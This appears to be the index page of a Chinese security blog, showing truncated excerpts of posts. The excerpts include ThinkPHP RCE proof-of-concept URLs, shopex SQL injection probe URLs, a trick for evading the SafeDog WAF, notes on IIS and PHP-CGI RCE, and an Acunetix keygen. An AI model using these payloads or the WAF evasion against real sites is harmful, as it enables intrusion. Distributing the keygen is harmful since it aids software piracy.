thinkphp-RCE-POC

官方公告: 1、https://blog.thinkphp.cn/869075 2、https://blog.thinkphp.cn/910675 POC: thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username 2、http://192.168.1.1/th...

- 阅读全文 -

扫目录过狗过waf方法

用御剑的朋友都遇到过这个页面吧,装狗了开启保护就会这样 本机搭建安全狗设置发现,默认是过蜘蛛的,所以只要把http头来路改成蜘蛛的useragent就ok了 无奈御剑和wscan 都是无法设置http头的,也无法用burp做代理中转改http头 像AWVS,Burp类大型扫描工具也可以进行目录扫描,并且也可以挂代理,改http头,不过个人感觉远没有专业扫描工具来的简单 因此翻出一款老工具 DirB...

- 阅读全文 -

IIS最新高危漏洞POC及在线检测源码-CVE-2015-1635-MS15-034

HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034) 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。https://technet.microsoft.com/zh-cn/library/security/MS1...

- 阅读全文 -

shopex两处通杀注入

一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。 如何注入就不多说了,自己捉摸! https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html https://www.webshell.cc/comment-8967'/**/and/**/Ex...

- 阅读全文 -

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没...

- 阅读全文 -

Acunetix Web Vulnerability Scanner 8.x Enterprise Edition KeyGen By Hmily[LCG]

这是一款网络漏洞扫描工具。通过网络爬虫测试你的网站安全,检测流行的攻击 ,如交叉站点脚本,sql 注入等。在被黑客攻击前扫描购物车,表格、安全区域和其他Web应用程序。75% 的互联网攻击目标是基于Web的应用程序。因为他们时常接触机密数据并且被放置在防火墙之前。 企业原版下载地址:http://www.acunetix.com/download/fullver8 ID: acunetixwvsf...

- 阅读全文 -

backtrack常用渗透命令

whois 域名/ip 查看域名的详细信息。 ping 域名/ip 测试本机到远端主机是否联通。 dig 域名/ip 查看域名解析的详细信息。 host -l 域名 dns服务器 传输zone。 查询信息的网站: http://centralops.net http://www.dnsstuff.com http://serversniff.net http://news.netcraft.com...

- 阅读全文 -